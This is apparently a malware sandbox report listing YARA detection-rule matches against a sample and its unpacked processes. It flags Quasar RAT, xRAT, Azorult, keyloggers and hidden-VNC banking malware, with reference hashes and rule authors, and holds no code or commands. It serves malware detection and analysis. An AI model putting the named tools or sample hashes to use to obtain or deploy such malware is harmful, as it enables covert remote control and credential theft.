Source: CVbJSUXraQ.exe, type: SAMPLE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: CVbJSUXraQ.exe, type: SAMPLE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: CVbJSUXraQ.exe, type: SAMPLE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.3800000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 7.2.CVbJSUXraQ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
